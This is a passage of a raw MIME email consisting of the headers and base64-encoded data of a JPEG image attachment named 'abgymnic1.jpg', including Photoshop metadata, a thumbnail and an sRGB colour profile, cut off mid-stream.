------=_NextPart_001_0023_01C217D4.8D47E540-- ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: image/jpeg; name="abgymnic1.jpg" Content-Transfer-Encoding: base64 Content-ID: <001e01c217c3$c9afd300$0100c0a8@jose> /9j/4AAQSkZJRgABAgEAlgCWAAD/7RJCUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAAlgAAAAEA AgCWAAAAAQACOEJJTQQNAAAAAAAEAAAAeDhCSU0D8wAAAAAACAAAAAAAAAAAOEJJTQQKAAAAAAAB AAA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9m ZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4 AAAAAABwAAD/////////////////////////////A+gAAAAA//////////////////////////// /wPoAAAAAP////////////////////////////8D6AAAAAD///////////////////////////// A+gAADhCSU0ECAAAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBBQAAAAAAAQAAAABOEJJTQQMAAAA ABCxAAAAAQAAAHAAAABLAAABUAAAYnAAABCVABgAAf/Y/+AAEEpGSUYAAQIBAEgASAAA/+4ADkFk b2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwMDAwRDAwMDAwM DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwMDAwREQwMDAwM DBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgASwBwAwEiAAIRAQMRAf/dAAQAB//E AT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAAAQACAwQFBgcI CQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVSwWIzNHKC0UMH JZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSltcXV5fVWZnaG lqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFRYXEiEwUygZEU obFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOEw9N14/NGlKSF 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 IC0gc1JHQgAAAAAAAAAAAAAALklFQyA2MTk2Ni0yLjEgRGVmYXVsdCBSR0IgY29sb3VyIHNwYWNl IC0gc1JHQgAAAAAAAAAAAAAAAAAAAAAAAAAAAABkZXNjAAAAAAAAACxSZWZlcmVuY2UgVmlld2lu ZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAsUmVmZXJlbmNlIFZpZXdpbmcg Q29uZGl0aW9uIGluIElFQzYxOTY2LTIuMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdmlldwAA AAAAE6T+ABRfLgAQzxQAA+3MAAQTCwADXJ4AAAABWFlaIAAAAAAATAlWAFAAAABXH+dtZWFzAAAA AAAAAAEAAAAAAAAAAAAAAAAAAAAAAAACjwAAAAJzaWcgAAAAAENSVCBjdXJ2AAAAAAAABAAAAAAF AAoADwAUABkAHgAjACgALQAyADcAOwBAAEUASgBPAFQAWQBeAGMAaABtAHIAdwB8AIEAhgCLAJAA lQCaAJ8ApACpAK4AsgC3ALwAwQDGAMsA0ADVANsA4ADlAOsA8AD2APsBAQEHAQ0BEwEZAR8BJQEr ATIBOAE+AUUBTAFSAVkBYAFnAW4BdQF8AYMBiwGSAZoBoQGpAbEBuQHBAckB0QHZAeEB6QHyAfoC AwIMAhQCHQImAi8COAJBAksCVAJdAmcCcQJ6AoQCjgKYAqICrAK2AsECywLVAuAC6wL1AwADCwMW AyEDLQM4A0MDTwNaA2YDcgN+A4oDlgOiA64DugPHA9MD4APsA/kEBgQTBCAELQQ7BEgEVQRjBHEE fgSMBJoEqAS2BMQE0wThBPAE/gUNBRwFKwU6BUkFWAVnBXcFhgWWBaYFtQXFBdUF5QX2BgYGFgYn BjcGSAZZBmoGewaMBp0GrwbABtEG4wb1BwcHGQcrBz0HTwdhB3QHhgeZB6wHvwfSB+UH+AgLCB8I MghGCFoIbgiCCJYIqgi+CNII5wj7CRAJJQk6CU8JZAl5CY8JpAm6Cc8J5Qn7ChEKJwo9ClQKagqB CpgKrgrFCtwK8wsLCyILOQtRC2kLgAuYC7ALyAvhC/kMEgwqDEMMXAx1DI4MpwzADNkM8w0NDSYN QA1aDXQNjg2pDcMN3g34DhMOLg5JDmQOfw6bDrYO0g7uDwkPJQ9BD14Peg+WD7MPzw/sEAkQJhBD EGEQfhCbELkQ1xD1ERMRMRFPEW0RjBGqEckR6BIHEiYSRRJkEoQSoxLDEuMTAxMjE0MTYxODE6QT xRPlFAYUJxRJFGoUixStFM4U8BUSFTQVVhV4FZsVvRXgFgMWJhZJFmwWjxayFtYW+hcdF0EXZReJ F64X0hf3GBsYQBhlGIoYrxjVGPoZIBlFGWsZkRm3Gd0aBBoqGlEadxqeGsUa7BsUGzsbYxuKG7Ib 2hwCHCocUhx7HKMczBz1HR4dRx1wHZkdwx3sHhYeQB5qHpQevh7pHxMfPh9pH5Qfvx/qIBUgQSBs IJggxCDwIRwhSCF1IaEhziH7IiciVSKCIq8i3SMKIzgjZiOUI8Ij8CQfJE0kfCSrJNolCSU4JWgl lyXHJfcmJyZXJocmtyboJxgnSSd6J6sn3CgNKD8ocSiiKNQpBik4KWspnSnQKgIqNSpoKpsqzysC KzYraSudK9EsBSw5LG4soizXLQwtQS12Last4S4WLkwugi63Lu4vJC9aL5Evxy/+MDUwbDCkMNsx EjFKMYIxujHyMioyYzKbMtQzDTNGM38zuDPxNCs0ZTSeNNg1EzVNNYc1wjX9Njc2cjauNuk3JDdg N5w31zgUOFA4jDjIOQU5Qjl/Obw5+To2OnQ6sjrvOy07azuqO+g8JzxlPKQ84z0iPWE9oT3gPiA+ YD6gPuA/IT9hP6I/4kAjQGRApkDnQSlBakGsQe5CMEJyQrVC90M6Q31DwEQDREdEikTORRJFVUWa Rd5GIkZnRqtG8Ec1R3tHwEgFSEtIkUjXSR1JY0mpSfBKN0p9SsRLDEtTS5pL4kwqTHJMuk0CTUpN k03cTiVObk63TwBPSU+TT91QJ1BxULtRBlFQUZtR5lIxUnxSx1MTU19TqlP2VEJUj1TbVShVdVXC Vg9WXFapVvdXRFeSV+BYL1h9WMtZGllpWbhaB1pWWqZa9VtFW5Vb5Vw1XIZc1l0nXXhdyV4aXmxe vV8PX2Ffs2AFYFdgqmD8YU9homH1YklinGLwY0Njl2PrZEBklGTpZT1lkmXnZj1mkmboZz1nk2fp aD9olmjsaUNpmmnxakhqn2r3a09rp2v/bFdsr20IbWBtuW4SbmtuxG8eb3hv0XArcIZw4HE6cZVx 8HJLcqZzAXNdc7h0FHRwdMx1KHWFdeF2Pnabdvh3VnezeBF4bnjMeSp5iXnnekZ6pXsEe2N7wnwh fIF84X1BfaF+AX5ifsJ/I3+Ef+WAR4CogQqBa4HNgjCCkoL0g1eDuoQdhICE44VHhauGDoZyhteH O4efiASIaYjOiTOJmYn+imSKyoswi5aL/IxjjMqNMY2Yjf+OZo7OjzaPnpAGkG6Q1pE/kaiSEZJ6 kuOTTZO2lCCUipT0lV+VyZY0lp+XCpd1l+CYTJi4mSSZkJn8mmia1ZtCm6+cHJyJnPedZJ3SnkCe rp8dn4uf+qBpoNihR6G2oiailqMGo3aj5qRWpMelOKWpphqmi6b9p26n4KhSqMSpN6mpqhyqj6sC q3Wr6axcrNCtRK24ri2uoa8Wr4uwALB1sOqxYLHWskuywrM4s660JbSctRO1irYBtnm28Ldot+C4 WbjRuUq5wro7urW7LrunvCG8m70VvY++Cr6Evv+/er/1wHDA7MFnwePCX8Lbw1jD1MRRxM7FS8XI xkbGw8dBx7/IPci8yTrJuco4yrfLNsu2zDXMtc01zbXONs62zzfPuNA50LrRPNG+0j/SwdNE08bU SdTL1U7V0dZV1tjXXNfg2GTY6Nls2fHadtr724DcBdyK3RDdlt4c3qLfKd+v4DbgveFE4cziU+Lb 42Pj6+Rz5PzlhOYN5pbnH+ep6DLovOlG6dDqW+rl63Dr++yG7RHtnO4o7rTvQO/M8Fjw5fFy8f/y jPMZ86f0NPTC9VD13vZt9vv3ivgZ+Kj5OPnH+lf65/t3/Af8mP0p/br+S/7c/23////uAA5BZG9i ZQBkgAAAAAH/2wCEABALCwsMCxAMDBAXDw0PFxsUEBAUGx8XFxcXFx8RDAwMDAwMEQwMDAwMDAwM DAwMDAwMDAwMDAwMDAwMDAwMDAwBEQ8PERMRFRISFRQODg4UFA4ODg4UEQwMDAwMEREMDAwMDAwR DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDP/AABEIAVEB9AMBIgACEQEDEQH/3QAEACD/xADD AAABBQEBAAAAAAAAAAAAAAADAAECBAUGBwEAAwEBAQAAAAAAAAAAAAAAAAECAwQFEAACAQMBBAQI CQgHBwMEAwABAgMAEQQSITETBUFRIjJhcZFCUiMUBoFicpLSM0NTFaGx0YKismOTwcJzg6MkVOHi s9M0JTXwRBbxw+Nk8oRFEQACAQICBgYGCAYCAgMBAAAAAQIRAyESMUFRIlIEYXEyQhMUkWKSoiNT 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 